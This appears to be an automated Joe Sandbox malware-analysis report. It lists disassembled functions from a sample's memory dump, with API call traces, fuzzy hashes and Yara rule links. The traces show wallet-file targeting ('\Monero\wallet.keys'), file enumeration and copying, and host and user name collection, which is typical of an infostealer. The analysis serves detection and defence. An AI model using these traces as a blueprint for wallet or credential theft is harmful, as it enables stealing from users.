Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 2616b2e22c70cca2cbbad3ea4cac24c6d100c4d6c1c722e880b9a5d2031a54c0
Instruction ID: 338c128e89caead066973d9166e476319d11a3af84b17f55caf02c3bcb9876b3
Opcode Fuzzy Hash: 2616b2e22c70cca2cbbad3ea4cac24c6d100c4d6c1c722e880b9a5d2031a54c0
Instruction Fuzzy Hash: 0091E9729141089BCB04FBA4DC96FEE7378AF95300F404569F517B61A1EF74AA48CF62

Function 0095B0B0 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

lstrlen.KERNEL32(00000000), ref: 0095B2AE
lstrlen.KERNEL32(00000000), ref: 0095B2C2

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: afaa192bce9bb0174f908e3e6dfe45c46e80ddf7aac2cae164ff90833aa7f091
Instruction ID: 241f66d6606dea3f48d61bd00ce5bafbf320ff4826c96fa39058acefc4b8b4fc
Opcode Fuzzy Hash: afaa192bce9bb0174f908e3e6dfe45c46e80ddf7aac2cae164ff90833aa7f091
Instruction Fuzzy Hash: 6971DB729141089BCB04FBA4DCA6EEE7378AF95304F404529F517B71A1EF74AA48CF62

Function 00964690 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00968880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

lstrcat.KERNEL32(?,00000000), ref: 009646CA
lstrcat.KERNEL32(?,0120E198), ref: 009646E8

Part of subcall function 009643F0: wsprintfA.USER32 ref: 0096440C
Part of subcall function 009643F0: FindFirstFileA.KERNEL32(?,?), ref: 00964423

Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,00970FAC), ref: 00964451
Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,00970FB0), ref: 00964467
Part of subcall function 009643F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0096465D
Part of subcall function 009643F0: FindClose.KERNEL32(000000FF), ref: 00964672

Part of subcall function 009643F0: wsprintfA.USER32 ref: 00964490
Part of subcall function 009643F0: StrCmpCA.SHLWAPI(?,009708BA), ref: 009644A5
Part of subcall function 009643F0: wsprintfA.USER32 ref: 009644C2
Part of subcall function 009643F0: PathMatchSpecA.SHLWAPI(?,?), ref: 009644FE
Part of subcall function 009643F0: lstrcat.KERNEL32(?,0120F440), ref: 0096452A
Part of subcall function 009643F0: lstrcat.KERNEL32(?,00970FC8), ref: 0096453C
Part of subcall function 009643F0: lstrcat.KERNEL32(?,?), ref: 00964550
Part of subcall function 009643F0: lstrcat.KERNEL32(?,00970FCC), ref: 00964562
Part of subcall function 009643F0: lstrcat.KERNEL32(?,?), ref: 00964576
Part of subcall function 009643F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0096458C
Part of subcall function 009643F0: DeleteFileA.KERNEL32(?), ref: 00964611

Part of subcall function 009643F0: wsprintfA.USER32 ref: 009644E7

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 510d734485ff4b33e955c618603aed010cdfd7ddf3fee7a35507ec6945774a1e
Instruction ID: 7fed643f801117e8a318c59bec7f5498c0b3920441dc3db075bb1a3bb88f008a
Opcode Fuzzy Hash: 510d734485ff4b33e955c618603aed010cdfd7ddf3fee7a35507ec6945774a1e
Instruction Fuzzy Hash: B54154B75001046BC754EBA4EC42FEE373CA7D9300F40855DB94E97281ED756AC88BA2

Function 009566B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00956756
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 009567A3

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 04afda628e4490f187103b0cf9f04c93a5082c17718558f3a63bda3a565b0acf
Instruction ID: f563bfb548b6fa093225ffd590272a9fd0de79de5838c3a3df838470172bb238
Opcode Fuzzy Hash: 04afda628e4490f187103b0cf9f04c93a5082c17718558f3a63bda3a565b0acf
Instruction Fuzzy Hash: 0541F934A00209EFCB44CF99C494BADBBB1FF48315F6486A9E9499B345C735EA85CF84

Function 00964B30 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00968880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

lstrcat.KERNEL32(?,00000000), ref: 00964B6A
lstrcat.KERNEL32(?,0120EE08), ref: 00964B88

Part of subcall function 009643F0: wsprintfA.USER32 ref: 0096440C
Part of subcall function 009643F0: FindFirstFileA.KERNEL32(?,?), ref: 00964423

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 7ec44259ce17e8e5a2029d1302b5d581936808af1fbb43af5f668531f0752e6e
Instruction ID: 12496ff2665222477a7b43d63ce0424132a3b0a27b0893b34426da101772b3d5
Opcode Fuzzy Hash: 7ec44259ce17e8e5a2029d1302b5d581936808af1fbb43af5f668531f0752e6e
Instruction Fuzzy Hash: 4F01967650020867CB58FBA0DC86FDA773C9B94300F404249B64E57191FEB4AAC88BA1

Function 009510A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009510B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009510F7

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2b00fe7f182e37cc05bcadc0d86cf4b82c5fb00d2d31c5b1d7e1b6ae93c3cc92
Instruction ID: 2a93b144184d2605a2bd43139050f06498ce9d0c36ee06925423457dd4556db6
Opcode Fuzzy Hash: 2b00fe7f182e37cc05bcadc0d86cf4b82c5fb00d2d31c5b1d7e1b6ae93c3cc92
Instruction Fuzzy Hash: 77F0E271641218BBE714EAB5AC59FABB7ECA705B45F300548F904E7280D971AF048B60

Function 00968830 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00951B94,?,?,0097554C,?,?,00970E07), ref: 0096883F

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3eb7fa60ce83b3f6ad5cbda0d16b58dabb89fd52c16921f652cbc28ef82b6d9e
Instruction ID: af968f0e578832d191c42d66bdae8a3d1d5c32c3533c60267a04a61b61c65158
Opcode Fuzzy Hash: 3eb7fa60ce83b3f6ad5cbda0d16b58dabb89fd52c16921f652cbc28ef82b6d9e
Instruction Fuzzy Hash: 31F03970C0020CEFCB04EFA4C94969DBB75EB10310F508699E829AB291DFB45B89DF81

Function 00968880 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009688AB

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 3ae1e56a3201e77d985917074491b49f392a0e4265e7d9846f0d8db3694803f3
Instruction ID: 14071e435f1c0a27a23c9d9012d74380219c739138241a3a1dbcc932b5361b9f
Opcode Fuzzy Hash: 3ae1e56a3201e77d985917074491b49f392a0e4265e7d9846f0d8db3694803f3
Instruction Fuzzy Hash: 95E01A31A4034C6BDB55EB90CC96FEE737C9B44B01F004294BA0C5B1C0DE70AB858B91

Function 00951190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00967380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009673B0
Part of subcall function 00967380: RtlAllocateHeap.NTDLL(00000000), ref: 009673B7
Part of subcall function 00967380: GetComputerNameA.KERNEL32(?,00000104), ref: 009673CF

Part of subcall function 009672F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967320
Part of subcall function 009672F0: RtlAllocateHeap.NTDLL(00000000), ref: 00967327
Part of subcall function 009672F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096733F

ExitProcess.KERNEL32 ref: 009511C6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
